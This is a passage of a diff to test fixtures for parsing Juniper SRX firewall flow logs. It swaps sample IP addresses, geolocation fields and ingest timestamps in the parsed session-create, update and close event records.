source-port=\"53232\" destination-address=\"175.16.199.1\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"175.16.199.1\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", + "ingested": "2021-12-10T10:15:58.025403200Z", + "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP RST\" source-address=\"192.168.2.164\" source-port=\"53232\" destination-address=\"172.16.1.19\" destination-port=\"445\" service-name=\"junos-smb\" nat-source-address=\"192.168.2.164\" nat-source-port=\"53232\" nat-destination-address=\"172.16.1.19\" nat-destination-port=\"445\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"35\" source-zone-name=\"Trust\" destination-zone-name=\"Trust\" session-id-32=\"206\" packets-from-client=\"13\" bytes-from-client=\"4274\" packets-from-server=\"9\" bytes-from-server=\"1575\" elapsed-time=\"16\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/2.0\"]", "kind": "event", "start": "2019-04-13T14:33:06.576Z", "action": "flow_close", @@ -1151,7 +1019,7 @@ "port": 53, "bytes": 136, "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1159,24 +1027,24 @@ "destination": { "nat": { "port": 53, - "ip": "58.68.126.198" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, "bytes": 136, - "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 1 }, "rule": { "name": "NAT" @@ -1184,26 +1052,23 @@ "source": { "nat": { "port": 11152, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 52890, "bytes": 72, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "packets": 1 }, "juniper": { @@ -1246,9 +1111,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "58.68.126.198" + "67.43.156.14" ] }, "client": { @@ -1258,13 +1121,13 @@ "port": 52890, "bytes": 72, "packets": 1, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 8000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715434901Z", - "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.34 reason=\"idle Timeout\" source-address=\"216.160.83.57\" source-port=\"52890\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"11152\" nat-destination-address=\"58.68.126.198\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025411100Z", + "original": "\u003c14\u003e1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"67.43.156.14\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"11152\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-10-07T01:32:20.898Z", "action": "flow_close", @@ -1288,7 +1151,7 @@ "port": 53, "bytes": 116, "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1296,24 +1159,24 @@ "destination": { "nat": { "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, "bytes": 116, - "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 1 }, "rule": { "name": "trust-to-untrust-001" @@ -1321,27 +1184,12 @@ "source": { "nat": { "port": 20215, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.0.47" }, "port": 62047, "bytes": 67, - "ip": "216.160.83.57", - "packets": 1 + "packets": 1, + "ip": "192.168.255.2" }, "juniper": { "srx": { @@ -1383,8 +1231,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "192.168.255.2", + "67.43.156.15", + "192.168.0.47" ] }, "client": { @@ -1394,13 +1243,13 @@ "port": 62047, "bytes": 67, "packets": 1, - "ip": "216.160.83.57" + "ip": "192.168.255.2" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715439189Z", - "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"idle Timeout\" source-address=\"216.160.83.57\" source-port=\"62047\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"20215\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025419Z", + "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-06-30T02:17:22.753Z", "action": "flow_close", @@ -1424,7 +1273,7 @@ "port": 21, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "10.104.12.161" }, "log": { "level": "informational" @@ -1434,22 +1283,10 @@ "port": 21, "ip": "10.12.70.1" }, - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 21, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "10.104.12.161" }, "rule": { "name": "FW-FTP" @@ -1457,27 +1294,12 @@ "source": { "nat": { "port": 58020, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "10.9.1.150" }, "port": 9057, "bytes": 0, - "ip": "216.160.83.57", - "packets": 0 + "packets": 0, + "ip": "10.164.110.223" }, "juniper": { "srx": { @@ -1520,8 +1342,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", + "10.164.110.223", + "10.104.12.161", + "10.9.1.150", "10.12.70.1" ] }, @@ -1532,13 +1355,13 @@ "port": 9057, "bytes": 0, "packets": 0, - "ip": "216.160.83.57" + "ip": "10.164.110.223" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715443998Z", - "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason=\"application failure or action\" source-address=\"216.160.83.57\" source-port=\"9057\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:15:58.025427400Z", + "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", "kind": "event", "start": "2015-09-25T14:19:53.846Z", "action": "flow_close", @@ -1560,7 +1383,7 @@ "port": 21 }, "port": 21, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1568,22 +1391,22 @@ "destination": { "nat": { "port": 21, - "ip": "207.17.137.56" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 21, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "General-Outbound" @@ -1591,25 +1414,22 @@ "source": { "nat": { "port": 14406, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 3129, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "juniper": { "srx": { @@ -1644,9 +1464,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "207.17.137.56" + "192.168.224.30", + "67.43.156.14" ] }, "client": { @@ -1654,12 +1473,12 @@ "port": 14406 }, "port": 3129, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715448326Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address=\"216.160.83.57\" source-port=\"3129\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025435600Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "action": "flow_started", "category": [ @@ -1681,7 +1500,7 @@ "port": 21, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1689,24 +1508,24 @@ "destination": { "nat": { "port": 21, - "ip": "207.17.137.56" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 21, "bytes": 0, - "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 0 }, "rule": { "name": "General-Outbound" @@ -1714,26 +1533,23 @@ "source": { "nat": { "port": 14406, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 3129, "bytes": 48, - "ip": "216.160.83.57", + "ip": "192.168.224.30", "packets": 1 }, "juniper": { @@ -1771,9 +1587,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "207.17.137.56" + "192.168.224.30", + "67.43.156.14" ] }, "client": { @@ -1783,13 +1598,13 @@ "port": 3129, "bytes": 48, "packets": 1, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-11-25T09:37:16.715452314Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address=\"216.160.83.57\" source-port=\"3129\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025443300Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", "action": "flow_started", @@ -1813,7 +1628,7 @@ "port": 21, "bytes": 104, "packets": 2, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1821,24 +1636,24 @@ "destination": { "nat": { "port": 21, - "ip": "207.17.137.56" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 21, "bytes": 104, - "packets": 2, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 2 }, "rule": { "name": "General-Outbound" @@ -1846,26 +1661,23 @@ "source": { "nat": { "port": 14406, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 3129, "bytes": 144, - "ip": "216.160.83.57", + "ip": "192.168.224.30", "packets": 3 }, "juniper": { @@ -1905,9 +1717,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "207.17.137.56" + "192.168.224.30", + "67.43.156.14" ] }, "client": { @@ -1917,13 +1728,13 @@ "port": 3129, "bytes": 144, "packets": 3, - "ip": "216.160.83.57" + "ip": "192.168.224.30" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715456081Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"application failure or action\" source-address=\"216.160.83.57\" source-port=\"3129\" destination-address=\"175.16.199.1\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025447100Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", "action": "flow_close", @@ -1947,7 +1758,7 @@ "port": 80, "bytes": 686432, "packets": 584, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1955,24 +1766,24 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 686432, - "packets": 584, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 584 }, "rule": { "name": "permit-all" @@ -1980,26 +1791,23 @@ "source": { "nat": { "port": 33040, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 33040, "bytes": 19592, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2050,9 +1858,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2062,13 +1869,13 @@ "port": 33040, "bytes": 19592, "packets": 371, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715461070Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"33040\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"175.16.199.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025452500Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:18.040Z", "action": "flow_started", @@ -2090,7 +1897,7 @@ "port": 80 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2098,22 +1905,22 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "rule": { "name": "permit-all" @@ -2121,28 +1928,25 @@ "source": { "nat": { "port": 33040, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 33040, "user": { "name": "user1" }, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2190,9 +1994,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { @@ -2200,12 +2003,12 @@ "port": 33040 }, "port": 33040, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715465028Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"33040\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"175.16.199.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” 